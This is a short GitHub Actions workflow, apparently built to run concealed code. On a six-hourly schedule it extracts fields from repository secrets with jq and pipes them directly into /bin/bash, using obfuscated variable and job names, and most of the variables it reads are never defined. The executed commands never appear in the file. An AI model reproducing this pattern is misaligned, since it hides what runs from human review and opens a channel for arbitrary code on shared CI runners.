name: huangtaozi6518
on:
  workflow_dispatch:
  schedule:
    - cron: '57 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huangtaozi6518
        env:
          iecg4: ${{ secrets.iecg4 }}
        run: |
          echo $iecg4 | jq -r .wep008 | /bin/bash
          echo $ffhs18 | jq -r .wlc1 | /bin/bash
          echo $wtlhf07715 | jq -r .gpgmb1208 | /bin/bash
          echo $cxn8494 | jq -r .lvl9 | /bin/bash
          echo $pltui7 | jq -r .hgwr7085 | /bin/bash
          echo $mkcm63709 | jq -r .jrch6183 | /bin/bash
          echo $vymiy339 | jq -r .deaw34 | /bin/bash
          echo $fjie65847 | jq -r .yvcst8708 | /bin/bash

